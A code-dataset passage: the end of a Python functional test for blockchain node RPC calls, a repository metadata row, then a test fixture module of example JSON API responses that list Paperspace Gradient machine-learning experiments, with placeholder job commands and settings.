not in r assert_raises_rpc_error(-8, "foohash is not a valid hash_type", node.gettxoutsetinfo, "foohash") def _test_getblockheader(self): node = self.nodes[0] assert_raises_rpc_error(-8, "hash must be of length 64 (not 8, for 'nonsense')", node.getblockheader, "nonsense") assert_raises_rpc_error(-8, "hash must be hexadecimal string (not 'ZZZ7bb8b1697ea987f3b223ba7819250cae33efacb068d23dc24859824a77844')", node.getblockheader, "ZZZ7bb8b1697ea987f3b223ba7819250cae33efacb068d23dc24859824a77844") assert_raises_rpc_error(-5, "Block not found", node.getblockheader, "0cf7bb8b1697ea987f3b223ba7819250cae33efacb068d23dc24859824a77844") besthash = node.getbestblockhash() secondbesthash = node.getblockhash(199) header = node.getblockheader(blockhash=besthash) assert_equal(header['hash'], besthash) assert_equal(header['height'], 200) assert_equal(header['confirmations'], 1) assert_equal(header['previousblockhash'], secondbesthash) assert_is_hex_string(header['chainwork']) assert_equal(header['nTx'], 1) assert_is_hash_string(header['hash']) assert_is_hash_string(header['previousblockhash']) assert_is_hash_string(header['merkleroot']) assert_is_hash_string(header['bits'], length=None) assert isinstance(header['time'], int) assert isinstance(header['mediantime'], int) assert isinstance(header['nonce'], int) assert isinstance(header['version'], int) assert isinstance(int(header['versionHex'], 16), int) assert isinstance(header['difficulty'], Decimal) header_hex = node.getblockheader(blockhash=besthash, verbose=False) assert_is_hex_string(header_hex) header = from_hex(CBlockHeader(), header_hex) header.calc_sha256() assert_equal(header.hash, besthash) assert 'previousblockhash' not in node.getblockheader(node.getblockhash(0)) assert 'nextblockhash' not in node.getblockheader(node.getbestblockhash()) def _test_getdifficulty(self): difficulty = self.nodes[0].getdifficulty() assert abs(difficulty * 2**31 - 1) < 0.0001 def _test_getnetworkhashps(self): hashes_per_second = self.nodes[0].getnetworkhashps() assert abs(hashes_per_second * 300 - 1) < 0.0001 def _test_stopatheight(self): assert_equal(self.nodes[0].getblockcount(), 200) self.nodes[0].generatetoaddress(6, ADDRESS_BCRT1_P2WSH_OP_TRUE) assert_equal(self.nodes[0].getblockcount(), 206) self.log.debug('Node should not stop at this height') assert_raises(subprocess.TimeoutExpired, lambda: self.nodes[0].process.wait(timeout=3)) try: self.nodes[0].generatetoaddress(1, ADDRESS_BCRT1_P2WSH_OP_TRUE) except (ConnectionError, http.client.BadStatusLine): pass self.log.debug('Node should stop at this height...') self.nodes[0].wait_until_stopped() self.start_node(0) assert_equal(self.nodes[0].getblockcount(), 207) def _test_waitforblockheight(self): self.log.info("Test waitforblockheight") node = self.nodes[0] peer = node.add_p2p_connection(P2PInterface()) current_height = node.getblock(node.getbestblockhash())['height'] b20hash = node.getblockhash(20) b20 = node.getblock(b20hash) def solve_and_send_block(prevhash, height, time): b = create_block(prevhash, create_coinbase(height), time) b.solve() peer.send_and_ping(msg_block(b)) return b b21f = solve_and_send_block(int(b20hash, 16), 21, b20['time'] + 1) b22f = solve_and_send_block(b21f.sha256, 22, b21f.nTime + 1) node.invalidateblock(b22f.hash) def assert_waitforheight(height, timeout=2): assert_equal( node.waitforblockheight(height=height, timeout=timeout)['height'], current_height) assert_waitforheight(0) assert_waitforheight(current_height - 1) assert_waitforheight(current_height) assert_waitforheight(current_height + 1) def _test_getblock(self): node = self.nodes[0] miniwallet = MiniWallet(node) miniwallet.scan_blocks(num=5) fee_per_byte = Decimal('0.00000010') fee_per_kb = 1000 * fee_per_byte miniwallet.send_self_transfer(fee_rate=fee_per_kb, from_node=node) blockhash = node.generate(1)[0] self.log.info("Test that getblock with verbosity 1 doesn't include fee") block = node.getblock(blockhash, 1) assert 'fee' not in block['tx'][1] self.log.info('Test that getblock with verbosity 2 includes expected fee') block = node.getblock(blockhash, 2) tx = block['tx'][1] assert 'fee' in tx assert_equal(tx['fee'], tx['vsize'] * fee_per_byte) self.log.info("Test that getblock with verbosity 2 still works with pruned Undo data") datadir = get_datadir_path(self.options.tmpdir, 0) self.log.info("Test that getblock with invalid verbosity type returns proper error message") assert_raises_rpc_error(-1, "JSON value is not an integer as expected", node.getblock, blockhash, "2") def move_block_file(old, new): old_path = os.path.join(datadir, self.chain, 'blocks', old) new_path = os.path.join(datadir, self.chain, 'blocks', new) os.rename(old_path, new_path) # Move instead of deleting so we can restore chain state afterwards move_block_file('rev00000.dat', 'rev_wrong') block = node.getblock(blockhash, 2) assert 'fee' not in block['tx'][1] # Restore chain state move_block_file('rev_wrong', 'rev00000.dat') assert 'previousblockhash' not in node.getblock(node.getblockhash(0)) assert 'nextblockhash' not in node.getblock(node.getbestblockhash()) if __name__ == '__main__': BlockchainTest().main()
true
true
f7291090bfe14fc6df33c64d5eeb8c89fdfcc10b
338,371
py
Python
tests/example_responses.py
vishalbelsare/gradient-cli
c0e06252925cad3ad73d47ded1100f6b0cb0989a
[ "0BSD" ]
52
2019-06-10T04:20:00.000Z
2021-12-06T01:13:26.000Z
tests/example_responses.py
vishalbelsare/gradient-cli
c0e06252925cad3ad73d47ded1100f6b0cb0989a
[ "0BSD" ]
125
2019-06-05T16:34:19.000Z
2022-03-30T18:46:06.000Z
tests/example_responses.py
vishalbelsare/gradient-cli
c0e06252925cad3ad73d47ded1100f6b0cb0989a
[ "0BSD" ]
11
2019-07-16T06:48:55.000Z
2021-12-15T12:41:51.000Z
LIST_OF_EXPERIMENTS_RESPONSE_JSON = { "data": [ { "dtCreated": "2019-03-21T07:47:05.616096+00:00", "dtDeleted": None, "dtFinished": None, "dtModified": "2019-03-21T07:47:05.616096+00:00", "dtProvisioningFinished": None, "dtProvisioningStarted": None, "dtStarted": None, "dtTeardownFinished": None, "dtTeardownStarted": None, "experimentError": None, "experimentTemplateHistoryId": 6315, "experimentTemplateId": 60, "experimentTypeId": 1, "handle": "ea2lfbbpdyzsq", "id": 6292, "projectHandle": "prq70zy79", "projectId": 612, "started_by_user_id": 1, "state": 1, "templateHistory": { "dtCreated": "2019-03-21T07:47:04.925852+00:00", "dtDeleted": None, "experimentTemplateId": 60, "id": 6315, "params": { "experimentTypeId": 1, "name": "dsfads", "ports": 5000, "project_handle": "prq70zy79", "worker_command": "sadas", "worker_container": "asd", "worker_machine_type": "sadas" }, "triggerEvent": None, "triggerEventId": None }, "datasets": [ { "uri": "s3://some/dataset", "volume_options": { "kind": "dynamic", "size": "10Gi", }, }, ], }, { "dtCreated": "2019-03-21T07:46:57.706055+00:00", "dtDeleted": None, "dtFinished": None, "dtModified": "2019-03-21T07:46:57.706055+00:00", "dtProvisioningFinished": None, "dtProvisioningStarted": None, "dtStarted": None, "dtTeardownFinished": None, "dtTeardownStarted": None, "experimentError": None, "experimentTemplateHistoryId": 6314, "experimentTemplateId": 60, "experimentTypeId": 1, "handle": "em6btk2vtb7it", "id": 6291, "projectHandle": "prq70zy79", "projectId": 612, "started_by_user_id": 1, "state": 1, "templateHistory": { "dtCreated": "2019-03-21T07:46:56.949590+00:00", "dtDeleted": None, "experimentTemplateId": 60, "id": 6314, "params": { "experimentTypeId": 1, "name": "dsfads", "ports": 5000, "project_handle": "prq70zy79", "worker_command": "sadas", "worker_container": "asd", "worker_machine_type": "sadas" }, "triggerEvent": None, "triggerEventId": None } }, { "dtCreated": "2019-03-20T19:56:50.154853+00:00", "dtDeleted": None, "dtFinished": None, "dtModified": "2019-03-20T19:56:50.154853+00:00", "dtProvisioningFinished": None, "dtProvisioningStarted": None, "dtStarted": None, "dtTeardownFinished": None, "dtTeardownStarted": None, "experimentError": None, "experimentTemplateHistoryId": 6297, "experimentTemplateId": 60, "experimentTypeId": 3, "handle": "ew69ls0vy3eto", "id": 6286, "projectHandle": "prq70zy79", "projectId": 612, "started_by_user_id": 1, "state": 1, "templateHistory": { "dtCreated": "2019-03-20T19:56:49.427354+00:00", "dtDeleted": None, "experimentTemplateId": 60, "id": 6297, "params": { "artifactDirectory": "/artdir", "clusterId": 2, "experimentEnv": { "key": "val" }, "experimentTypeId": 3, "name": "multinode_mpi", "parameter_server_command": "ls", "parameter_server_container": "pscon", "parameter_server_container_user": "pscuser", "parameter_server_count": 2, "parameter_server_machine_type": "psmtype", "parameter_server_registry_password": "psrpass", "parameter_server_registry_username": "psrcus", "ports": 3456, "project_handle": "prq70zy79", "project_id": 34, "trigger_event_id": 12, "worker_command": "wcom", "worker_container": "wcon", "worker_container_user": "usr", "worker_count": 2, "worker_machine_type": "mty", "worker_registry_password": "rpass", "worker_registry_username": "rusr", "workingDirectory": "/dir", "workspaceUrl": "wurl" }, "triggerEvent": { "dtCreated": "2019-03-11T14:47:57+00:00", "eventData": { "author": { "email": "bluckey@paperspace.com", "login": "ultrabluewolf", "name": "Britney Luckey" }, "branch": "feature/test-1", "message": "Update readme #2", "repo_node_id": "MDEwOlJlcG9zaXRvcnkxNzQ3MjI3NDc=", "sender": { "id": 4633049, "login": "ultrabluewolf" }, "sha": "daa117a00cd1e0e9b1b55695031e698a560cca29", "timestamp": "2019-03-11T10:47:57-04:00" }, "id": 12, "type": "github" }, "triggerEventId": 12 } } ], "message": "success", "meta": { "filter": [], "limit": 11, "offset": 0, "totalItems": 27 } } LIST_OF_EXPERIMENTS_FILTERED_WITH_TWO_PROJECTS = { "data": [ { "data": [ { "dtCreated": "2019-03-21T08:48:49.449397+00:00", "dtDeleted": None, "dtFinished": None, "dtModified": "2019-03-21T08:48:49.449397+00:00", "dtProvisioningFinished": None, "dtProvisioningStarted": None, "dtStarted": None, "dtTeardownFinished": None, "dtTeardownStarted": None, "experimentError": "Expecting value: line 1 column 1 (char 0)", "experimentTemplateHistoryId": 297, "experimentTemplateId": 8, "experimentTypeId": 1, "handle": "esj8mcpaayh5kx", "id": 295, "projectHandle": "pr4yxj956", "projectId": 14898, "started_by_user_id": 1, "state": 7, "templateHistory": { "dtCreated": "2019-03-21T08:48:48.436994+00:00", "dtDeleted": None, "experimentTemplateId": 8, "id": 297, "params": { "artifactDirectory": "sagdf", "clusterId": 342, "experimentEnv": { "k": "v" }, "experimentTypeId": 1, "name": "dsfads", "ports": 3245, "project_handle": "pr4yxj956", "worker_command": "sadas", "worker_container": "asd", "worker_machine_type": "C2", "workingDirectory": "sadfas", "workspaceUrl": "sadfds" }, "triggerEvent": None, "triggerEventId": None } }, { "dtCreated": "2019-03-21T08:48:29.553574+00:00", "dtDeleted": None, "dtFinished": None, "dtModified": "2019-03-21T08:48:29.553574+00:00", "dtProvisioningFinished": None, "dtProvisioningStarted": None, "dtStarted": None, "dtTeardownFinished": None, "dtTeardownStarted": None, "experimentError": "{'name': 'Error', 'status': 400, 'message': 'Invalid machine type'}", "experimentTemplateHistoryId": 296, "experimentTemplateId": 8, "experimentTypeId": 1, "handle": "estun7jhqta8sm", "id": 294, "projectHandle": "pr4yxj956", "projectId": 14898, "started_by_user_id": 1, "state": 7, "templateHistory": { "dtCreated": "2019-03-21T08:48:28.467167+00:00", "dtDeleted": None, "experimentTemplateId": 8, "id": 296, "params": { "artifactDirectory": "sagdf", "clusterId": 342, "experimentEnv": { "k": "v" }, "experimentTypeId": 1, "name": "dsfads", "ports": 3245, "project_handle": "pr4yxj956", "worker_command": "sadas", "worker_container": "asd", "worker_machine_type": "c2", "workingDirectory": "sadfas", "workspaceUrl": "sadfds" }, "triggerEvent": None, "triggerEventId": None } }, { "dtCreated": "2019-03-21T08:44:42.581919+00:00", "dtDeleted": None, "dtFinished": None, "dtModified": "2019-03-21T08:44:42.581919+00:00", "dtProvisioningFinished": None, "dtProvisioningStarted": None, "dtStarted": None, "dtTeardownFinished": None, "dtTeardownStarted": None, "experimentError": "{'name': 'Error', 'status': 400, 'message': 'Invalid machine type'}", "experimentTemplateHistoryId": 295, "experimentTemplateId": 8, "experimentTypeId": 1, "handle": "es08mwh7ye6zpm", "id": 293, "projectHandle": "pr4yxj956", "projectId": 14898, "started_by_user_id": 1, "state": 7, "templateHistory": { "dtCreated": "2019-03-21T08:44:41.366528+00:00", "dtDeleted": None, "experimentTemplateId": 8, "id": 295, "params": { "artifactDirectory": "sagdf", "clusterId": 342, "experimentEnv": { "k": "v" }, "experimentTypeId": 1, "name": "dsfads", "ports": 3245, "project_handle": "pr4yxj956", "worker_command": "sadas", "worker_container": "asd", "worker_machine_type": "sadas", "workingDirectory": "sadfas", "workspaceUrl": "sadfds" }, "triggerEvent": None, "triggerEventId": None } }, { "dtCreated": "2019-03-19T16:35:28.425184+00:00", "dtDeleted": None, "dtFinished": "2019-03-19T16:38:40.664560+00:00", "dtModified": "2019-03-19T16:35:28.425184+00:00", "dtProvisioningFinished": "2019-03-19T16:37:37.516138+00:00", "dtProvisioningStarted": "2019-03-19T16:37:37.516138+00:00", "dtStarted": "2019-03-19T16:37:37.516138+00:00", "dtTeardownFinished": "2019-03-19T16:38:40.664560+00:00", "dtTeardownStarted": "2019-03-19T16:38:40.664560+00:00", "experimentError": None, "experimentTemplateHistoryId": 38, "experimentTemplateId": 8, "experimentTypeId": 1, "handle": "eshdufkt9ti8mx", "id": 38, "projectHandle": "pr4yxj956", "projectId": 14898, "started_by_user_id": 199654, "state": 5, "templateHistory": { "dtCreated": "2019-03-19T16:35:28.425184+00:00", "dtDeleted": None, "experimentTemplateId": 8, "id": 38, "params": { "command": "python2 hello.py", "container": "paperspace/tensorflow-python", "project": "paperspace-python", "workspaceFileName": "hello.py.zip" }, "triggerEvent": None, "triggerEventId": None } }, { "dtCreated": "2019-03-19T14:52:42.476592+00:00", "dtDeleted": None, "dtFinished": "2019-03-19T14:53:00.850701+00:00", "dtModified": "2019-03-19T14:52:42.476592+00:00", "dtProvisioningFinished": "2019-03-19T14:52:46.844619+00:00", "dtProvisioningStarted": "2019-03-19T14:52:46.844619+00:00", "dtStarted": "2019-03-19T14:52:46.844619+00:00", "dtTeardownFinished": "2019-03-19T14:53:00.850701+00:00", "dtTeardownStarted": "2019-03-19T14:53:00.850701+00:00", "experimentError": None, "experimentTemplateHistoryId": 34, "experimentTemplateId": 8, "experimentTypeId": 1, "handle": "e07h0ym8fewm", "id": 34, "projectHandle": "pr4yxj956", "projectId": 14898, "started_by_user_id": 199654, "state": 5, "templateHistory": { "dtCreated": "2019-03-19T14:52:42.476592+00:00", "dtDeleted": None, "experimentTemplateId": 8, "id": 34, "params": { "command": "python2 hello.py", "container": "paperspace/tensorflow-python", "project": "paperspace-python", "workspaceFileName": "hello.py.zip" }, "triggerEvent": None, "triggerEventId": None } }, { "dtCreated": "2019-03-19T14:46:21.605202+00:00", "dtDeleted": None, "dtFinished": "2019-03-19T14:46:40.360111+00:00", "dtModified": "2019-03-19T14:46:21.605202+00:00", "dtProvisioningFinished": "2019-03-19T14:46:26.094384+00:00", "dtProvisioningStarted": "2019-03-19T14:46:26.094384+00:00", "dtStarted": "2019-03-19T14:46:26.094384+00:00", "dtTeardownFinished": "2019-03-19T14:46:40.360111+00:00", "dtTeardownStarted": "2019-03-19T14:46:40.360111+00:00", "experimentError": None, "experimentTemplateHistoryId": 33, "experimentTemplateId": 8, "experimentTypeId": 1, "handle": "e0fq31vyla039", "id": 33, "projectHandle": "pr4yxj956", "projectId": 14898, "started_by_user_id": 199654, "state": 5, "templateHistory": { "dtCreated": "2019-03-19T14:46:21.605202+00:00", "dtDeleted": None, "experimentTemplateId": 8, "id": 33, "params": { "command": "python3 hello.py", "container": "paperspace/tensorflow-python", "project": "paperspace-python", "workspaceFileName": "hello.py.zip" }, "triggerEvent": None, "triggerEventId": None } }, { "dtCreated": "2019-03-19T14:38:38.227536+00:00", "dtDeleted": None, "dtFinished": "2019-03-19T14:42:41.723400+00:00", "dtModified": "2019-03-19T14:38:38.227536+00:00", "dtProvisioningFinished": "2019-03-19T14:41:34.630690+00:00", "dtProvisioningStarted": "2019-03-19T14:41:34.630690+00:00", "dtStarted": "2019-03-19T14:41:34.630690+00:00", "dtTeardownFinished": "2019-03-19T14:42:41.723400+00:00", "dtTeardownStarted": "2019-03-19T14:42:41.723400+00:00", "experimentError": None, "experimentTemplateHistoryId": 32, "experimentTemplateId": 8, "experimentTypeId": 1, "handle": "esxz3ihfl9qxs2", "id": 32, "projectHandle": "pr4yxj956", "projectId": 14898, "started_by_user_id": 199654, "state": 5, "templateHistory": { "dtCreated": "2019-03-19T14:38:38.227536+00:00", "dtDeleted": None, "experimentTemplateId": 8, "id": 32, "params": { "command": "python3 hello.py", "container": "paperspace/tensorflow-python", "project": "paperspace-python", "workspaceFileName": "hello.py.zip" }, "triggerEvent": None, "triggerEventId": None } }, { "dtCreated": "2019-03-14T14:06:27.383232+00:00", "dtDeleted": None, "dtFinished": "2019-03-14T14:10:05.315380+00:00", "dtModified": "2019-03-14T14:06:27.383232+00:00", "dtProvisioningFinished": "2019-03-14T14:10:00.097887+00:00", "dtProvisioningStarted": "2019-03-14T14:09:02.736309+00:00", "dtStarted": "2019-03-14T14:10:00.097887+00:00", "dtTeardownFinished": "2019-03-14T14:10:05.809122+00:00", "dtTeardownStarted": "2019-03-14T14:10:05.462304+00:00", "experimentError": None, "experimentTemplateHistoryId": 32862, "experimentTemplateId": 8, "experimentTypeId": 1, "handle": "ecqq0rz0gok9i", "id": 32860, "projectHandle": "pr4yxj956", "projectId": 14898, "started_by_user_id": 199654, "state": 5, "templateHistory": { "dtCreated": "2019-03-22T23:31:15.372159+00:00", "dtDeleted": None, "experimentTemplateId": 8, "id": 32862, "params": { "clusterId": "clmtkpnm2", "command": "python3 hello.py", "containerUrl": "paperspace/tensorflow-python", "isPreemptible": False, "machineType": "K80", "name": "job 5", "projectId": "pr4yxj956", "startedByUserId": "u3z4be26", "workspaceUrl": "s3://ps-projects/pr4yxj956/jw276004uoaiv/hello.py.zip" }, "triggerEvent": None, "triggerEventId": None } }, { "dtCreated": "2019-03-14T11:22:14.345466+00:00", "dtDeleted": None, "dtFinished": "2019-03-14T11:23:17.763554+00:00", "dtModified": "2019-03-14T11:22:14.345466+00:00", "dtProvisioningFinished": "2019-03-14T11:23:12.549387+00:00", "dtProvisioningStarted": "2019-03-14T11:22:18.820247+00:00", "dtStarted": "2019-03-14T11:23:12.549387+00:00", "dtTeardownFinished": "2019-03-14T11:23:18.063367+00:00", "dtTeardownStarted": "2019-03-14T11:23:17.900575+00:00", "experimentError": None, "experimentTemplateHistoryId": 32859, "experimentTemplateId": 8, "experimentTypeId": 1, "handle": "es310784c1o1x6", "id": 32857, "projectHandle": "pr4yxj956", "projectId": 14898, "started_by_user_id": 199654, "state": 5, "templateHistory": { "dtCreated": "2019-03-22T23:31:15.372159+00:00", "dtDeleted": None, "experimentTemplateId": 8, "id": 32859, "params": { "clusterId": "clmtkpnm2", "command": "python3 hello.py", "containerUrl": "paperspace/tensorflow-python", "isPreemptible": False, "machineType": "K80", "name": "job 4", "projectId": "pr4yxj956", "startedByUserId": "u3z4be26", "workspaceUrl": "s3://ps-projects/pr4yxj956/jpngp435ekbp9/hello.py.zip" }, "triggerEvent": None, "triggerEventId": None } }, { "dtCreated": "2019-03-09T11:05:34.409959+00:00", "dtDeleted": None, "dtFinished": "2019-03-09T11:09:38.903533+00:00", "dtModified": "2019-03-09T11:05:34.409959+00:00", "dtProvisioningFinished": "2019-03-09T11:09:33.686660+00:00", "dtProvisioningStarted": "2019-03-09T11:08:34.681334+00:00", "dtStarted": "2019-03-09T11:09:33.686660+00:00", "dtTeardownFinished": "2019-03-09T11:09:39.194718+00:00", "dtTeardownStarted": "2019-03-09T11:09:39.036278+00:00", "experimentError": None, "experimentTemplateHistoryId": 32351, "experimentTemplateId": 8, "experimentTypeId": 1, "handle": "esabwtehoekn6w", "id": 32349, "projectHandle": "pr4yxj956", "projectId": 14898, "started_by_user_id": 199654, "state": 5, "templateHistory": { "dtCreated": "2019-03-22T23:31:15.372159+00:00", "dtDeleted": None, "experimentTemplateId": 8, "id": 32351, "params": { "clusterId": "clmtkpnm2", "command": "python3 hello.py", "containerUrl": "paperspace/tensorflow-python", "isPreemptible": False, "machineType": "K80", "name": "job 3", "projectId": "pr4yxj956", "startedByUserId": "u3z4be26", "workspaceUrl": "s3://ps-projects/pr4yxj956/jafb4f2w30afo/hello.py.zip" }, "triggerEvent": None, "triggerEventId": None } }, { "dtCreated": "2019-03-06T13:56:55.165302+00:00", "dtDeleted": None, "dtFinished": "2019-03-06T13:57:13.165854+00:00", "dtModified": "2019-03-06T13:56:55.165302+00:00", "dtProvisioningFinished": "2019-03-06T13:57:07.955608+00:00", "dtProvisioningStarted": "2019-03-06T13:57:00.905506+00:00", "dtStarted": "2019-03-06T13:57:07.955608+00:00", "dtTeardownFinished": "2019-03-06T13:57:13.454509+00:00", "dtTeardownStarted": "2019-03-06T13:57:13.299681+00:00", "experimentError": None, "experimentTemplateHistoryId": 31991, "experimentTemplateId": 8, "experimentTypeId": 1, "handle": "ea1d6t082wq7i", "id": 31989, "projectHandle": "pr4yxj956", "projectId": 14898, "started_by_user_id": 199654, "state": 5, "templateHistory": { "dtCreated": "2019-03-22T23:31:15.372159+00:00", "dtDeleted": None, "experimentTemplateId": 8, "id": 31991, "params": { "clusterId": "clmtkpnm2", "command": "python3 hello.py", "containerUrl": "paperspace/tensorflow-python", "isPreemptible": False, "machineType": "K80", "name": "job 2", "projectId": "pr4yxj956", "startedByUserId": "u3z4be26", "workspaceUrl": "s3://ps-projects/pr4yxj956/jst4l3hoi0hcyn/hello.py.zip" }, "triggerEvent": None, "triggerEventId": None } }, { "dtCreated": "2019-03-06T13:52:48.106674+00:00", "dtDeleted": None, "dtFinished": "2019-03-06T13:56:29.890444+00:00", "dtModified": "2019-03-06T13:52:48.106674+00:00", "dtProvisioningFinished": "2019-03-06T13:56:24.678388+00:00", "dtProvisioningStarted": "2019-03-06T13:55:32.325678+00:00", "dtStarted": "2019-03-06T13:56:24.678388+00:00", "dtTeardownFinished": "2019-03-06T13:56:30.178571+00:00", "dtTeardownStarted": "2019-03-06T13:56:30.024471+00:00", "experimentError": None, "experimentTemplateHistoryId": 31989, "experimentTemplateId": 8, "experimentTypeId": 1, "handle": "esbipxwngbmji4", "id": 31987, "projectHandle": "pr4yxj956", "projectId": 14898, "started_by_user_id": 199654, "state": 5, "templateHistory": { "dtCreated": "2019-03-22T23:31:15.372159+00:00", "dtDeleted": None, "experimentTemplateId": 8, "id": 31989, "params": { "clusterId": "clmtkpnm2", "command": "python3 hello.py", "containerUrl": "paperspace/tensorflow-python", "isPreemptible": False, "machineType": "K80", "name": "job 1", "projectId": "pr4yxj956", "startedByUserId": "u3z4be26", "workspaceUrl": "s3://ps-projects/pr4yxj956/j5cidd1koia24/hello.py.zip" }, "triggerEvent": None, "triggerEventId": None } } ], "meta": { "itemGroup": { "key": "projectHandle", "value": "pr4yxj956" }, "totalItems": 12 } }, { "data": [ { "dtCreated": "2019-03-25T14:35:05.738112+00:00", "dtDeleted": None, "dtFinished": "2019-03-25T14:35:21.314193+00:00", "dtModified": "2019-03-25T14:35:05.738112+00:00", "dtProvisioningFinished": "2019-03-25T14:35:12.777000+00:00", "dtProvisioningStarted": "2019-03-25T14:35:12.777000+00:00", "dtStarted": "2019-03-25T14:35:12.777000+00:00", "dtTeardownFinished": "2019-03-25T14:35:21.314193+00:00", "dtTeardownStarted": "2019-03-25T14:35:21.314193+00:00", "experimentError": None, "experimentTemplateHistoryId": 33353, "experimentTemplateId": 2257, "experimentTypeId": 1, "handle": "e8lufvr2bh8ld", "id": 33351, "projectHandle": "pr1opq9uz", "projectId": 15548, "started_by_user_id": 199654, "state": 7, "templateHistory": { "dtCreated": "2019-03-25T14:35:05.738112+00:00", "dtDeleted": None, "experimentTemplateId": 2257, "id": 33353, "params": { "command": "nvidia-smi", "container": "Test-Container", "isPreemptible": False, "machineType": "C2", "projectId": "pr1opq9uz", "workspaceFileName": "none" }, "triggerEvent": None, "triggerEventId": None } }, { "dtCreated": "2019-03-25T14:20:07.758313+00:00", "dtDeleted": None, "dtFinished": None, "dtModified": "2019-03-25T14:20:07.758313+00:00", "dtProvisioningFinished": None, "dtProvisioningStarted": None, "dtStarted": None, "dtTeardownFinished": None, "dtTeardownStarted": None, "experimentError": "Expecting value: line 1 column 1 (char 0)", "experimentTemplateHistoryId": 33352, "experimentTemplateId": 2257, "experimentTypeId": 1, "handle": "esasysj42i2j2s", "id": 33350, "projectHandle": "pr1opq9uz", "projectId": 15548, "started_by_user_id": 199654, "state": 7, "templateHistory": { "dtCreated": "2019-03-25T14:20:06.517435+00:00", "dtDeleted": None, "experimentTemplateId": 2257, "id": 33352, "params": { "experimentTypeId": 1, "name": "dsfads", "ports": 5000, "project_handle": "pr1opq9uz", "worker_command": "sadas", "worker_container": "asd", "worker_machine_type": "C2" }, "triggerEvent": None, "triggerEventId": None } }, { "dtCreated": "2019-03-15T11:46:32.978544+00:00", "dtDeleted": None, "dtFinished": "2019-03-15T11:46:50.541797+00:00", "dtModified": "2019-03-15T11:46:32.978544+00:00", "dtProvisioningFinished": "2019-03-15T11:46:45.501290+00:00", "dtProvisioningStarted": "2019-03-15T11:46:41.431717+00:00", "dtStarted": "2019-03-15T11:46:45.501290+00:00", "dtTeardownFinished": "2019-03-15T11:46:50.598748+00:00", "dtTeardownStarted": "2019-03-15T11:46:50.561267+00:00", "experimentError": None, "experimentTemplateHistoryId": 32879, "experimentTemplateId": 2257, "experimentTypeId": 1, "handle": "estgm33hfbqf5k", "id": 32877, "projectHandle": "pr1opq9uz", "projectId": 15548, "started_by_user_id": 199654, "state": 5, "templateHistory": { "dtCreated": "2019-03-22T23:31:15.372159+00:00", "dtDeleted": None, "experimentTemplateId": 2257, "id": 32879, "params": { "clusterId": "cls28l0qm", "command": "python3 myscript.py", "containerUrl": "paperspace/tensorflow-python", "isPreemptible": False, "machineType": "P5000", "name": "job 4", "projectId": "pr1opq9uz", "startedByUserId": "u3z4be26", "workspaceUrl": "s3://ps-projects/pr1opq9uz/j8bxv3ni2zc17/myscript.py.zip" }, "triggerEvent": None, "triggerEventId": None } }, { "dtCreated": "2019-03-15T11:46:32.513024+00:00", "dtDeleted": None, "dtFinished": "2019-03-15T11:46:50.363855+00:00", "dtModified": "2019-03-15T11:46:32.513024+00:00", "dtProvisioningFinished": "2019-03-15T11:46:45.324783+00:00", "dtProvisioningStarted": "2019-03-15T11:46:40.947880+00:00", "dtStarted": "2019-03-15T11:46:45.324783+00:00", "dtTeardownFinished": "2019-03-15T11:46:50.419813+00:00", "dtTeardownStarted": "2019-03-15T11:46:50.383192+00:00", "experimentError": None, "experimentTemplateHistoryId": 32878, "experimentTemplateId": 2257, "experimentTypeId": 1, "handle": "esbo3pisqq3t68", "id": 32876, "projectHandle": "pr1opq9uz", "projectId": 15548, "started_by_user_id": 199654, "state": 5, "templateHistory": { "dtCreated": "2019-03-22T23:31:15.372159+00:00", "dtDeleted": None, "experimentTemplateId": 2257, "id": 32878, "params": { "clusterId": "cls28l0qm", "command": "python3 myscript.py", "containerUrl": "paperspace/tensorflow-python", "isPreemptible": False, "machineType": "P5000", "name": "job 3", "projectId": "pr1opq9uz", "startedByUserId": "u3z4be26", "workspaceUrl": "s3://ps-projects/pr1opq9uz/jpk82qnq71w9c/myscript.py.zip" }, "triggerEvent": None, "triggerEventId": None } }, { "dtCreated": "2019-03-15T11:46:16.422317+00:00", "dtDeleted": None, "dtFinished": "2019-03-15T11:46:30.820071+00:00", "dtModified": "2019-03-15T11:46:16.422317+00:00", "dtProvisioningFinished": "2019-03-15T11:46:25.776927+00:00", "dtProvisioningStarted": "2019-03-15T11:46:21.616491+00:00", "dtStarted": "2019-03-15T11:46:25.776927+00:00", "dtTeardownFinished": "2019-03-15T11:46:30.873777+00:00", "dtTeardownStarted": "2019-03-15T11:46:30.839238+00:00", "experimentError": None, "experimentTemplateHistoryId": 32877, "experimentTemplateId": 2257, "experimentTypeId": 1, "handle": "eso8s7e014681", "id": 32875, "projectHandle": "pr1opq9uz", "projectId": 15548, "started_by_user_id": 199654, "state": 5, "templateHistory": { "dtCreated": "2019-03-22T23:31:15.372159+00:00", "dtDeleted": None, "experimentTemplateId": 2257, "id": 32877, "params": { "clusterId": "cls28l0qm", "command": "python3 test_remote.py", "containerUrl": "paperspace/tensorflow-python", "isPreemptible": False, "machineType": "P5000", "name": "job 2", "projectId": "pr1opq9uz", "startedByUserId": "u3z4be26", "workspaceUrl": "s3://ps-projects/pr1opq9uz/jsuqgzne50tlg1/test_remote.py.zip" }, "triggerEvent": None, "triggerEventId": None } }, { "dtCreated": "2019-03-15T11:26:14.607276+00:00", "dtDeleted": None, "dtFinished": "2019-03-15T11:26:32.872835+00:00", "dtModified": "2019-03-15T11:26:14.607276+00:00", "dtProvisioningFinished": "2019-03-15T11:26:27.823314+00:00", "dtProvisioningStarted": "2019-03-15T11:26:23.367983+00:00", "dtStarted": "2019-03-15T11:26:27.823314+00:00", "dtTeardownFinished": "2019-03-15T11:26:32.930538+00:00", "dtTeardownStarted": "2019-03-15T11:26:32.897522+00:00", "experimentError": None, "experimentTemplateHistoryId": 32876, "experimentTemplateId": 2257, "experimentTypeId": 1, "handle": "esml2ioetny5o6", "id": 32874, "projectHandle": "pr1opq9uz", "projectId": 15548, "started_by_user_id": 199654, "state": 5, "templateHistory": { "dtCreated": "2019-03-22T23:31:15.372159+00:00", "dtDeleted": None, "experimentTemplateId": 2257, "id": 32876, "params": { "clusterId": "cls28l0qm", "command": "python3 myscript.py", "containerUrl": "paperspace/tensorflow-python", "isPreemptible": False, "machineType": "P5000", "name": "job 1", "projectId": "pr1opq9uz", "startedByUserId": "u3z4be26", "workspaceUrl": "s3://ps-projects/pr1opq9uz/jsnze3m7s2xlpr/myscript.py.zip" }, "triggerEvent": None, "triggerEventId": None } } ], "meta": { "itemGroup": { "key": "projectHandle", "value": "pr1opq9uz" }, "totalItems": 6 } } ], "message": "success", "meta": { "filter": [], "limit": 1000000, "offset": 0, "totalItems": 18 } } 